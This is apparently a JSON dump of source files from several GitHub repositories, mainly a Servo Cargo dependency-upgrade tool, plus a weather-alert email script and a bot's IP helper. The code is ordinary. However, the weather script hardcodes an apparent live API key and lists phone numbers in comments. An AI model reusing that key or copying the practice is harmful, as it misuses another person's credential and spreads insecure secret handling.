HELP_SERVICE_MESSAGE\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6763284802436829, "avg_line_length": 24.875, "blob_id": "414dfb879b09f53a9bbe93a6f076e6b6fc01adff", "content_id": "8fb42889f6c8f052cd85cd32d3391b98c2be66d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 87, "num_lines": 8, "path": "/util/ip_handler.py", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "import urllib.request\n\n\ndef get_my_external_ip():\n external_ip = urllib.request.urlopen('https://api.ipify.org').read().decode('utf8')\n result = 'Server IP: {0}'.format(external_ip)\n\n return result\n" } ]
5
sompodsign/Rain-Alert
https://github.com/sompodsign/Rain-Alert
1db93c465c73fb795012b9dba07291909f2d6a6b
182075062356ff5dcfd01fe5033be5c13556e85b
661bf20827f0bdba47eabe071238c9b8e551c9bc
refs/heads/master
2023-02-23T11:49:07.789703
2021-01-30T16:16:47
2021-01-30T16:16:47
334,455,974
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5894187688827515, "alphanum_fraction": 0.6400893926620483, "avg_line_length": 26.387754440307617, "blob_id": "5221df96ffdaadbe380703fd7c8dfbc5812043fc", "content_id": "c1d436a98c7d97d00156255468904ca7ea6fa6c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1342, "license_type": "no_license", "max_line_length": 101, "num_lines": 49, "path": "/main.py", "repo_name": "sompodsign/Rain-Alert", "src_encoding": "UTF-8", "text": "import requests\nfrom smtplib import SMTP\n\n# Credentials for SMS system\n# import os\n# from twilio.rest import Client\n# account_sid = os.environ['']\n# auth_token = os.environ['']\n\nMAIL = \"\"\nPASSWORD = \"\"\n\nURL = \"https://api.openweathermap.org/data/2.5/onecall\"\napi_key = \"ddd5823d8829e48f928fb910ed78ab8c\"\nweather_params = {\n \"lat\": 23.822350,\n \"lon\": 90.365417,\n \"appid\": api_key,\n \"exclude\": \"current,minutely,daily\",\n}\n\nresponse = requests.get(URL, params=weather_params)\nresponse.raise_for_status()\nhourly = response.json()[\"hourly\"][0:12]\ngoing_to_rain = False\n\nfor hour in hourly:\n if hour[\"weather\"][0][\"id\"] < 600:\n going_to_rain = True\nif going_to_rain:\n # EMAIL SYSTEM\n with SMTP(\"smtp.gmail.com\") as connection:\n connection.starttls()\n connection.login(user=MAIL, password=PASSWORD)\n message = \"Subject: Rain\\n\\nIt's going to rain today. Bring an Umbrella with you.\\n\\nShampad\"\n connection.sendmail(from_addr=\"[email protected]\", to_addrs=\"[email protected]\", msg=message)\n connection.close()\n\n # SMS SYSTEM\n\n # client = Client(account_sid, auth_token)\n # message = client.messages \\\n # .create(\n # body=\"It's going to rain today. Bring an UMBRELLA with you.\",\n # from_='+12057549231',\n # to='+8801521239970'\n # )\n #\n # print(message.status)\n" } ]
1
chbrown13/servo-dependency-tool
https://github.com/chbrown13/servo-dependency-tool
5300c67c2ba126f0910bc1cb3a8746827940f052
8c2dece7967d8f8a67d35e31270f08fb30fedf92
ec6eca2f04b365f18a6f6c65df9364a2330f2833
refs/heads/master
2021-01-21T10:42:31.122605
2017-03-23T02:33:32
2017-03-23T02:33:32
83,477,063
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7235476970672607, "alphanum_fraction": 0.7427386045455933, "avg_line_length": 32.77193069458008, "blob_id": "164eba2847bcee7c01075867f942aa810f16b3f1", "content_id": "151806c0f3ad639bd981fde95e1728394b30efbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1928, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/test/test_cargo_lock_parser.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "import unittest\nimport os\nimport sys\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nsys.path.insert(0,path)\nimport cargo_lock_parser as parser\nfrom cargo_lock_parser import LockRoot, LockDependency, LockPackage, LockFile\n\nclass TestCargoLockParser(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.path = os.path.join(path,\"test\")\n\n\t\tself.root = LockRoot()\n\t\tself.root.name = \"webvr_traits\"\n\t\tself.root.version = \"0.0.1\"\n\n\t\tself.depend1 = LockDependency()\n\t\tself.depend1.name = \"ipc-channel\"\n\t\tself.depend1.version = \"0.7.0\"\n\t\tself.depend1.source = \"(registry+https://github.com/rust-lang/crates.io-index)\"\n\n\t\tself.package = LockPackage()\n\t\tself.package.name = \"servo\"\n\t\tself.package.version = \"0.0.1\"\n\t\tself.package.source = \"\"\n\n\t\tself.depend2 = LockDependency()\n\t\tself.depend2.name = \"android_injected_glue\"\n\t\tself.depend2.version = \"0.2.1\"\n\t\tself.depend2.source = \"(git+https://github.com/mmatyas/android-rs-injected-glue)\"\n\n\tdef test_lock_file_parse(self):\n\t\tfile = parser.lock_file_parse(\"Cargo.lock\")\n\t\tself.assertEqual(type(file),LockFile)\n\t\t\n\t\troot = file.root\n\t\tself.assertEqual(root.name,self.root.name)\n\t\tself.assertEqual(root.version,self.root.version)\n\t\tself.assertEqual(len(root.dependencies),5)\n\n\t\tself.assertEqual(root.dependencies[0].name,self.depend1.name)\n\t\tself.assertEqual(root.dependencies[0].version,self.depend1.version)\n\t\tself.assertEqual(root.dependencies[0].source,self.depend1.source)\n\n\t\tself.assertEqual(len(file.packages),319)\n\t\tpkg = file.packages[\"servo\"]\n\t\tself.assertEqual(pkg.name,self.package.name)\n\t\tself.assertEqual(pkg.version,self.package.version)\n\t\tself.assertEqual(pkg.source,self.package.source)\n\t\tself.assertFalse(pkg.upgrade_available)\n\n\t\tself.assertEqual(len(pkg.dependencies),18)\n\t\tdpd = pkg.dependencies[0]\n\t\tself.assertEqual(dpd.name,self.depend2.name)\n\t\tself.assertEqual(dpd.version,self.depend2.version)\n\t\tself.assertEqual(dpd.source,self.depend2.source)\n\n\n\n" }, { "alpha_fraction": 0.7552083134651184, "alphanum_fraction": 0.7604166865348816, "avg_line_length": 26.428571701049805, "blob_id": "3eac5d81293794329897a766fdfa7357db74f794", "content_id": "cdd438ea802194c6912da4a8543ba38a01f00b7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 69, "num_lines": 7, "path": "/setup.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "from distutils.core import setup\n\nsetup(\n name='servo-dependency-tool',\n description='Tool for automatically upgrading Cargo dependencies.',\n install_requires=['gitpython','github3.py'],\n)\n" }, { "alpha_fraction": 0.5777778029441833, "alphanum_fraction": 0.5815972089767456, "avg_line_length": 26.169811248779297, "blob_id": "8958f81bbd409fe687f37ca2c2b2d4cce91970d0", "content_id": "56dd6db64879b8ed29fc9f249b63d17aeaee8997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2880, "license_type": "no_license", "max_line_length": 109, "num_lines": 106, "path": "/crates_io_checker.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "from git import Repo, Remote\nimport git\nimport os\nimport platform\nimport json\nimport repo_management\n\nCRATES = \"crates.io-index\"\n\ndepend = {}\n\n\n# Delete repo and files when done\ndef cleanup():\n if platform.system() == \"Windows\":\n rm = 'rmdir /S /Q \"%s\"' % CRATES\n else:\n rm = \"rm -rf %s\" % CRATES\n os.system(rm)\n\n\n# Check for upgrades for input packages\ndef check_upgrade(package):\n if package.name not in depend.keys():\n # Error somewhere\n print(\"Package not found\")\n return False\n else:\n # Check input version vs latest version\n current = package.version\n latest = depend[package.name][-1][\"vers\"]\n print(\"Checking for '%s' upgrades... current= %s, latest= %s\" % (package.name, current, latest))\n package.version = latest\n return current != latest\n\n\n# Read dependency information from crates.io-index file and store in dict\ndef read_file(path):\n if path is None:\n return\n filename = os.path.basename(path)\n d = []\n with open(path, 'r') as f:\n for line in f:\n d.append(json.loads(line))\n depend[filename] = d\n\n\n# Check if file is in the current path\ndef check_folder(name, path):\n try:\n if name in os.listdir(path):\n file = os.path.join(path, name)\n return file\n except FileNotFoundError:\n return None\n return None\n\n\n# Check if a package exists in crates.io-index\ndef check_package(package):\n file = None\n pack = package.name\n if len(pack) > 3:\n split = [pack[i:i+2] for i in range(0, len(pack), 2)]\n path = os.path.join(CRATES, split[0])\n i = 0\n while file is None:\n i += 1\n if os.path.exists(path):\n file = check_folder(pack, path)\n else:\n # path doesn't exist\n break\n try:\n path = os.path.join(path, split[i])\n except IndexError:\n break\n else:\n if len(pack) == 3:\n file = check_folder(pack, os.path.join(CRATES, \"3\", pack[0]))\n else:\n file = check_folder(pack, os.path.join(CRATES, str(len(pack))))\n\n if file is None:\n print(\"Package '%s' Not Found\" % pack)\n return\n else:\n # print(\"Found package '%s'\"%pack)\n return file\n\n\ndef clone_crates():\n try:\n print(\"Cloning crates.io-index repository...(This may take a while)\") # Git submodules may avoid this\n repo = Repo.clone_from(\"https://github.com/rust-lang/crates.io-index.git\", CRATES)\n except git.exc.GitCommandError:\n # crates.io-index repo already exists\n git_path = os.path.abspath(os.path.join(os.path.dirname((CRATES)),CRATES))\n repo_management.pull(git_path)\n\n\ndef check(p):\n f = check_package(p)\n read_file(f)\n p.upgrade_available = check_upgrade(p)\n" }, { "alpha_fraction": 0.7161065936088562, "alphanum_fraction": 0.7172653675079346, "avg_line_length": 29.714284896850586, "blob_id": "d0e809509cdd8c960e4a5c06fe328046573187c6", "content_id": "167fce87e205b7ef14b933dd5a644286a624f426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 863, "license_type": "no_license", "max_line_length": 69, "num_lines": 28, "path": "/test/test_cargo_toml_updater.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "import unittest\nimport os\nimport sys\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nsys.path.insert(0,path)\nimport cargo_toml_updater as updater\nfrom cargo_lock_parser import lock_file_parse\n\nclass TestCargoTOMLUpdater(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.lock_file = lock_file_parse(\"Cargo.lock\")\n\t\tself.lock_file.packages[\"servo\"].upgrade_available = True\n\t\tself.lock_file.packages[\"toml\"].upgrade_available = True\n\t\tself.lock_file.packages[\"rustc-serialize\"].upgrade_available = True\n\n\t\twith open(\"Cargo.toml\",'r') as f:\n\t\t\tself.original = f.read()\n\n\tdef test_toml_file_update(self):\n\t\tupdater.toml_file_update(\"Cargo.toml\",self.lock_file)\n\t\twith open(\"Cargo.toml\",'r') as f:\n\t\t\tupdate = f.read()\n\t\tself.assertNotEqual(self.original,update)\n\n\tdef tearDown(self):\n\t\twith open(\"Cargo.toml\",'w') as f:\n\t\t\tf.write(self.original)\n\t\t\n" }, { "alpha_fraction": 0.6639566421508789, "alphanum_fraction": 0.6653116345405579, "avg_line_length": 38.254547119140625, "blob_id": "b9b2a8e53720d8f76a7cd3265dc8b5e24671cae8", "content_id": "07a9c8abce07fcad315762c06933fb39317451d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2214, "license_type": "no_license", "max_line_length": 118, "num_lines": 55, "path": "/repo_management.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "from git import Repo, Remote\r\nfrom github3 import login\r\nimport git\r\nimport traceback\r\n\r\n\r\n# Function that takes the local git clone directory path and the new branch name as parameters\r\n# and create a new branch in both the local repository and remote\r\ndef create_new_branch(path, branch_name):\r\n repo = Repo(path)\r\n new_branch = repo.create_head(branch_name)\r\n new_branch.commit\r\n repo.git.push(\"origin\", branch_name)\r\n\r\n\r\n# Function that pushes changes to the current branch of the remote repository (should be the newly created branch).\r\ndef push(path, branch_name, message):\r\n try:\r\n repo = Repo(path)\r\n print('Currently on branch: %s' % repo.head.ref)\r\n repo.git.checkout(branch_name)\r\n print('Switched to branch: %s' % repo.head.ref)\r\n print(repo.git.add(\".\"))\r\n print(repo.git.commit(m=message))\r\n repo.git.push(\"origin\", branch_name)\r\n print('')\r\n print(repo.git.status())\r\n except Exception:\r\n traceback.print_exc()\r\n\r\n\r\n# Function that pulls everything from the master branch of the the remote repository to the local git clone.\r\ndef pull(path):\r\n try:\r\n repo = git.Repo(path)\r\n origin = repo.remotes.origin\r\n # only pulls the master branch\r\n s = origin.pull(\"master\")\r\n # print(repo.git.status())\r\n except Exception:\r\n traceback.print_exc()\r\n\r\n\r\n# Function that opens a pull request against Servo's github repository from a particular branch on a fork.\r\ndef pull_request(username, password, title, base, head, body=None):\r\n # Login to the forked repo\r\n gh = login(username, password)\r\n # Create a Repository instance of servo (with owner Servo and repo name servo)\r\n repo = gh.repository(\"Servo\", \"servo\")\r\n # Now create the pull request\r\n repo.create_pull(title, base, head, body)\r\n # :param str title: (required) The title of the pull request.\r\n # :param str base: (required), The branch of the servo repo which you want the changes pulled into. e.g., 'master'\r\n # :param str head: (required), The place where your changes are implemented. e.g. 'qiufengyu21:master'\r\n # :param str body: (optional), The contents of the pull request.\r\n" }, { "alpha_fraction": 0.7132616639137268, "alphanum_fraction": 0.7250384092330933, "avg_line_length": 32.1016960144043, "blob_id": "1d31ece4fb1160a6a995a3e0b6c2d4f17cab2c8a", "content_id": "74a186d7a0bdd9bdd8998f3c32e160063b47d6d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1953, "license_type": "no_license", "max_line_length": 130, "num_lines": 59, "path": "/test/test_crates_io_checker.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "import unittest\nimport os\nimport sys\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nsys.path.insert(0,path)\nimport crates_io_checker as crates\nfrom cargo_lock_parser import LockPackage\n\nclass TestCratesIOChecker(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.path = os.path.join(path,\"test\")\n\n\t\tself.package = LockPackage()\n\t\tself.package.name = \"unittest\"\n\t\tself.package.version = \"1.0\"\n\t\tself.package.source = \"src\"\n\n\t\tself.package1 = LockPackage()\n\t\tself.package1.name = \"servo\"\n\t\tself.package1.version = \"1.0\"\n\t\tself.package.source = \"test\"\n\n\t\tself.package2 = LockPackage()\n\t\tself.package2.name = \"servo\"\n\t\tself.package2.version = \"2.0\"\n\t\tself.package.source = \"test\"\n\n\t\tcrates.depend = {\"servo\":[{\"name\":\"servo\",\"vers\":\"1.0\",\"deps\":[]},{\"name\":\"servo\",\"vers\":\"2.0\",\"deps\":[]}]}\n\t\tcrates.CRATES = \"cargo_test\"\n\n\tdef test_check_upgrade(self):\n\t\tself.assertFalse(crates.check_upgrade(self.package))\n\t\tself.assertTrue(crates.check_upgrade(self.package1))\n\t\tself.assertFalse(crates.check_upgrade(self.package2))\n\n\tdef test_read_file(self):\n\t\tself.assertIsNone(crates.read_file(None))\n\t\tself.assertFalse('testing' in crates.depend.keys())\n\t\tread = crates.check_folder(\"testing\",os.path.join(self.path,crates.CRATES,\"te\",\"st\"))\n\t\tself.assertIsNotNone(read)\n\t\tcrates.read_file(read)\n\t\tself.assertTrue('testing' in crates.depend.keys())\n\n\tdef test_check_folder(self):\n\t\tself.assertIsNone(crates.check_folder(\"test.txt\",self.path))\n\t\tself.assertEqual(os.path.join(self.path,\"test_crates_io_checker.py\"),crates.check_folder(\"test_crates_io_checker.py\",self.path))\n\n\tdef test_check_package(self):\n\t\ttest = LockPackage()\n\t\ttest.name = \"testing\"\n\t\tself.assertIsNotNone(crates.check_package(test))\n\t\tself.assertIsNone(crates.check_package(self.package))\n\n\tdef test_check(self):\n\t\tcrates.check(self.package1)\n\t\tself.assertTrue(self.package1.upgrade_available)\n\t\tcrates.check(self.package2)\n\t\tself.assertFalse(self.package2.upgrade_available)\n" }, { "alpha_fraction": 0.7081068754196167, "alphanum_fraction": 0.7081068754196167, "avg_line_length": 36.10924530029297, "blob_id": "43516d20db2a4bef0832c6d8e6b4d02fc62ee5d8", "content_id": "09c92764de14b721c6cb74aa3ebde1451358494a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4416, "license_type": "no_license", "max_line_length": 111, "num_lines": 119, "path": "/servo_dependency_tool.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "# Servo Dependency Tool\n#\n# Authors:\n# Chris Brown ([email protected])\n# Bradford Ingersoll ([email protected])\n# Qiufeng Yu ([email protected])\n\nimport datetime\nimport getpass\nimport os\nimport shutil\n\nimport cargo_lock_parser\nimport cargo_toml_updater\nimport crates_io_checker\nimport repo_management\nimport run_cargo_update\n\n#\n# Main\n#\n\n# Perform a \"git pull\" on the parent directory\ngit_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nprint('Performing git pull inside \"%s\"...' % git_path)\nprint('')\nrepo_management.pull(git_path)\n\n# Create a new branch before making any updates\nbranch_name = datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S_crate_update\")\nprint('Creating new branch: %s...' % branch_name)\nprint('')\nrepo_management.create_new_branch('..', branch_name)\n\n# Edit .gitignore to add this servo-dependency-tool directory\nwith open(os.path.join(git_path, '.gitignore'), \"r\") as f:\n tool_ignored = False\n for line in f:\n if line == 'servo-dependency-tool/':\n tool_ignored = True\nif not tool_ignored:\n print('Adding /servo-dependency-tool to .gitignore...')\n print('')\n with open(os.path.join(git_path, '.gitignore'), \"a\") as f:\n f.write('\\n')\n f.write('# Servo Dependency Tool\\n')\n f.write('/servo-dependency-tool')\n\n# Check for existence of Cargo.lock file and parse it\nfor filename in os.listdir(git_path):\n if filename == \"Cargo.lock\":\n print('Parsing Cargo.lock file...')\n print('')\n lock_file = cargo_lock_parser.lock_file_parse(os.path.join(git_path, filename))\n\n# Ignore hyper dependencies per Josh Matthews: \"Can't update hyper without additional work\"\n# Do so by removing it from the collection\npackage_names_to_ignore = []\nfor package_name in lock_file.packages:\n if package_name.startswith('hyper'):\n package_names_to_ignore.append(package_name)\nfor name in package_names_to_ignore:\n print('Removing %s from packages to update...' % name)\n del lock_file.packages[name]\nprint('')\n\n# Run crates_io_checker which determines the latest version for all packages in lock_file.packages\ncrates_io_checker.clone_crates()\nprint('Checking crates.io for latest version of each package...')\nprint('')\nfor package_name in lock_file.packages:\n crates_io_checker.check(lock_file.packages[package_name])\n\n# Remove the cloned crates.io-index. We do this here\n# so that the upcoming directory tree traversal won't\n# go into the crates.io-index folders.\nprint('Removing local clone of crates.io...')\nprint('')\nshutil.rmtree('crates.io-index')\n\n# Loop through directory tree\n# For each instance of Cargo.toml, call toml_file_update to update\n# the version numbers for each dependency\nprint('Iterating through all Cargo.toml files and updating their dependency versions...')\nprint('')\nfor root, dirs, files in os.walk(git_path):\n if 'servo-dependency-tool' in dirs:\n dirs.remove('servo-dependency-tool') # Don't visit this tool's directory\n for filename in files:\n if filename.lower() == \"cargo.toml\":\n toml_file_path = os.path.join(root, filename)\n cargo_toml_updater.toml_file_update(toml_file_path, lock_file)\n\n# \"Delete\" Cargo.lock to avoid conflicts (rename to Cargo.lock.bak)\nprint('Making a backup (Cargo.lock.bak) of the current Cargo.lock before updating...')\nprint('')\nos.rename(os.path.join(git_path, 'Cargo.lock'), os.path.join(git_path, 'Cargo.lock.bak'))\n\n# Loop through the packages again and call run_cargo_update\n# to run the appropriate update command.\nprint('Running appropriate cargo update command for each package...')\nprint('')\nfor package_name in lock_file.packages:\n if lock_file.packages[package_name].upgrade_available:\n run_cargo_update.run_update(git_path, lock_file.packages[package_name])\n\n# Push the updates to origin/branch_name\nprint('Pushing changes to new branch...')\nprint('')\nrepo_management.push(git_path, branch_name, 'Updated dependencies')\n\n# Pull request on master\nprint('Initiating pull request...')\ngh_username = input('GitHub Username: ')\ngh_password = getpass.getpass('GitHub Password: ')\ntitle = 'Updated dependencies in Cargo.toml files to latest versions'\ndesc = 'Updated all Cargo.toml files with the latest versions found on crates.io for all dependencies and ran \\\n \"./mach cargo-update -p <package_name> for each'\nrepo_management.pull_request(gh_username, gh_password, title, 'master', gh_username + ':' + branch_name, desc)\n" }, { "alpha_fraction": 0.5556005835533142, "alphanum_fraction": 0.5590439438819885, "avg_line_length": 47.861385345458984, "blob_id": "7fe1a6b80650134bbdbab479fe97d5620273aadf", "content_id": "8240fc6594fd5776c23eb6df012015b2d7db8a08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4937, "license_type": "no_license", "max_line_length": 117, "num_lines": 101, "path": "/cargo_lock_parser.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "# Cargo.lock Parser\n#\n# This script parses a Cargo.lock file and converts it into a\n# LockFile object. A LockFile object contains all of the information about\n# the [root] and the [[package]] sections within a Cargo.lock file.\n# NOTE: Must be placed in the same folder as the Cargo.lock file\n#\n# From our Initial Steps requirement:\n# \"write code that takes a Cargo.lock file as input and determines\n# the list of crate names and versions that are dependencies\"\n\nimport re\n\n\n# Object representing the root. A Cargo.lock file will always have one [[root]]\nclass LockRoot:\n\n def __init__(self):\n self.name = \"\"\n self.version = \"\"\n self.dependencies = []\n\n\n# Object representing a dependency. Each [[root]] and [[package]] within a Cargo.lock file can have >= 0 dependencies\nclass LockDependency:\n\n def __init__(self):\n self.name = \"\"\n self.version = \"\"\n self.source = \"\"\n\n\n# Object representing a [[package]] within the Cargo.lock file. A Cargo.lock file can have >= 0 packages\nclass LockPackage:\n\n def __init__(self):\n self.name = \"\"\n self.version = \"\"\n self.upgrade_available = False\n self.source = \"\"\n self.dependencies = []\n\n\n# Object representing an entire Cargo.lock file\nclass LockFile:\n\n def __init__(self):\n self.root = LockRoot()\n self.packages = {} # dictionary\n\n\n# Method to parse the passed file (a Cargo.lock file)\n# and return the lock_file object\ndef lock_file_parse(fname):\n with open(fname, 'r') as fp:\n lock_file = LockFile()\n lock_package_to_add = LockPackage() # temporary LockPackage object\n dependency_to_add = LockDependency() # temporary LockDependency object\n in_root = True # flag to determine whether the current lines are within the root or not\n for line in fp:\n if line.strip():\n if in_root:\n if line.strip().startswith('name'):\n lock_file.root.name = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('version'):\n lock_file.root.version = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('\"'): # lines that start with \" are dependencies\n dependency_string = re.findall(r'\"(.*?)\"', line)[0].split(' ')\n dependency_to_add.name = dependency_string[0] # All dependencies should have a name\n dependency_to_add.version = dependency_string[1] # All dependencies should have a version\n if len(dependency_string) == 3: # If the dependency has a third field, it has a source\n dependency_to_add.source = dependency_string[2]\n lock_file.root.dependencies.append(dependency_to_add)\n dependency_to_add = LockDependency()\n elif line.strip() == \"[[package]]\": # End of Root\n in_root = False\n else:\n # If [[package]] is found, we've reached a new package\n if line.strip() == \"[[package]]\":\n # If lock_package_to_add has data, add to list and then reset\n if lock_package_to_add.name != \"\":\n lock_file.packages[lock_package_to_add.name] = lock_package_to_add\n lock_package_to_add = LockPackage()\n elif line.strip().startswith('name'):\n lock_package_to_add.name = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('version'):\n lock_package_to_add.version = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('source'):\n lock_package_to_add.source = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('[metadata]'):\n lock_file.packages[lock_package_to_add.name] = lock_package_to_add # add the last entry\n break\n elif not in_root and line.strip().startswith('\"'): # lines that start with \" are dependencies\n dependency_string = re.findall(r'\"(.*?)\"', line)[0].split(' ')\n dependency_to_add.name = dependency_string[0] # All dependencies should have a name\n dependency_to_add.version = dependency_string[1] # All dependencies should have a version\n if len(dependency_string) == 3: # If the dependency has a third field, it has a source\n dependency_to_add.source = dependency_string[2]\n lock_package_to_add.dependencies.append(dependency_to_add)\n dependency_to_add = LockDependency()\n return lock_file # return the lock_file object\n\n\n" }, { "alpha_fraction": 0.4993864893913269, "alphanum_fraction": 0.5012270212173462, "avg_line_length": 45.57143020629883, "blob_id": "297429b21a76c323d99721dee4bc3a35ddf6f809", "content_id": "ed149b41e28d557ecb2507820c85507848b8c379", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1630, "license_type": "no_license", "max_line_length": 114, "num_lines": 35, "path": "/cargo_toml_updater.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "# Cargo.toml File Updater\n#\n# This script parses a cargo.toml file and updates all of the version numbers\n# to the version numbers from the lock_file object\n\nimport re\n\n\n# Method to update the passed file (a Cargo.toml file)\ndef toml_file_update(fname, lock_file):\n with open(fname, 'r+') as fp:\n in_dependencies = False\n lines = fp.readlines()\n fp.seek(0)\n fp.truncate()\n for line in lines:\n if line.strip():\n if line.strip().startswith('['):\n if line.strip().endswith('dependencies]'):\n in_dependencies = True\n else:\n in_dependencies = False\n elif in_dependencies:\n dependency_name = line.split(' ')[0]\n if dependency_name in lock_file.packages: # Check if package exists\n if lock_file.packages[dependency_name].upgrade_available: # Check if upgrade was found\n if len(line.split(' ')) == 3: # Line with format: <package> = \"<version>\"\n version_string = '\"' + lock_file.packages[dependency_name].version + '\"'\n line = re.sub(r'\"(.*?)\"', version_string, line)\n elif 'version = \"' in line:\n version_string = 'version = \"' + lock_file.packages[dependency_name].version + '\"'\n line = re.sub(r'version = \"(.*?)\"', version_string, line)\n else:\n in_dependencies = False\n fp.write(line)\n" }, { "alpha_fraction": 0.70652174949646, "alphanum_fraction": 0.717391312122345, "avg_line_length": 29.66666603088379, "blob_id": "eb4564efa31d434b06f6b9d0639378285ec9905d", "content_id": "1d99d3b1f43aca878fb6653eab4afa2be3779ccd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 92, "license_type": "no_license", "max_line_length": 55, "num_lines": 3, "path": "/test/README.md", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "## Servo Dependency Tool Unittests\n\nRun: python3 -m unittest \\<module-name> (without \".py\")\n" }, { "alpha_fraction": 0.7355595827102661, "alphanum_fraction": 0.750902533531189, "avg_line_length": 41.21904754638672, "blob_id": "1a18ba937fac717535fed4e5da9623350e8ade24", "content_id": "d56f895f65b43bb590fb1990282f356fe1b6c701", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4432, "license_type": "no_license", "max_line_length": 558, "num_lines": 105, "path": "/README.md", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "# Cargo Upgrade Service Project\nNC State CSC517: Object-Oriented Design and Development\n\nChris Brown ([email protected]) \nBradford Ingersoll ([email protected]) \nQiufeng Yu ([email protected])\n\nThe **Servo Dependency Tool** is a set of python scripts that automatically upgrades [Cargo](http://doc.crates.io/index.html) dependencies for the Servo web browser engine (Github page: https://github.com/servo/servo).\n\n## Video:\n[![Demo Video](https://img.youtube.com/vi/-xS-6JY2o_o/0.jpg)](https://www.youtube.com/watch?v=-xS-6JY2o_o)\n\n## Background Information\n[Servo](https://github.com/servo/servo) is a prototype web browser engine written in the Rust language. It is currently developed on 64bit OS X, 64bit Linux, and Android. Servo depends on numerous other Rust libraries that are published on [the package manager crates.io](https://crates.io/). There are no notifications for when packages are updated; it's up to developers to keep track of when they need to upgrade their dependencies. The goal of the Servo Dependency Tool is to automatically upgrade Servo's dependencies whenever new versions are released.\n\n## Tool Workflow Overview\n*This gives a high-level summary of the tool's workflow*\n1. Perform a pull to ensure servo is up-to-date\n2. Create a new branch for the updates\n3. Parse the Cargo.lock file for all packages and their current versions\n4. Clone the crates.io index and check each package from the previous step for a more recent version\n5. Locate all Cargo.toml files in the servo project and update their dependencies with the most recent version found in the previous step\n6. Execute the cargo update command for each package (specifying version when ambiguity occurs)\n7. Push these updates to the upstream branch\n8. Create a pull request on the main servo repository with these updated dependencies\n\n## Installation\n### Prerequisites\n- [Servo web engine](https://github.com/servo/servo)\n- [Python3](https://www.python.org/download/releases/3.0/)\n### Installing GitPython and github3.py\nThe Servo Dependency Tool requires two external libraries ([GitPython](https://github.com/gitpython-developers/GitPython) and [github3.py](https://github.com/sigmavirus24/github3.py)) in order to interact with the Servo github, push lastest dependencies and open pull requests.\n- Install GitPython\n```\n python3 -m pip install gitpython\n```\n- Install github3.py\n```\n python3 -m pip install github3.py\n```\n## Running Locally\nIn order to run the tool, first make a local clone of the [Servo](https://github.com/servo/servo) repository\n```\n git clone https://github.com/servo/servo.git\n```\nand then run the main driver file: **servo_dependency_tool.py**.\n```\n python3 servo_dependency_tool.py\n```\nThe tool will first do a git pull command to get the latest fork of the Servo repository, then it wil create a new branch on the local clone and update all the dependencies. Finaly, it will open a new pull request against Servo's github repository from our local fork.\n\n**For more detailed instructions on how to use this tool, please click on the video on the top.**\n\n[Issue Tracker](https://github.com/servo/servo/issues/15600)\n\n[Servo Wiki page](https://github.com/servo/servo/wiki/Cargo-upgrade-service-project)\n\n## Running on Amazon AWS (Ubuntu 14.04)\nLaunch a virtual machine with EC2 (Ubuntu 14.04)\n\nOnce running, SSH to the server using the steps listed on the EC2 Instances \"Connect\" button\n\nOnce logged in, update the package listings in apt-get\n```\n sudo apt-get update\n```\n\nInstall all necessary packages for servo (from Servo README)\n```\n sudo apt-get install git curl freeglut3-dev autoconf \\\n libfreetype6-dev libgl1-mesa-dri libglib2.0-dev xorg-dev \\\n gperf g++ build-essential cmake python-virtualenv python-pip \\\n libssl-dev libbz2-dev libosmesa6-dev libxmu6 libxmu-dev \\\n libglu1-mesa-dev libgles2-mesa-dev libegl1-mesa-dev libdbus-1-dev\n```\n\nInstall python3 pip\n```\n sudo apt-get install 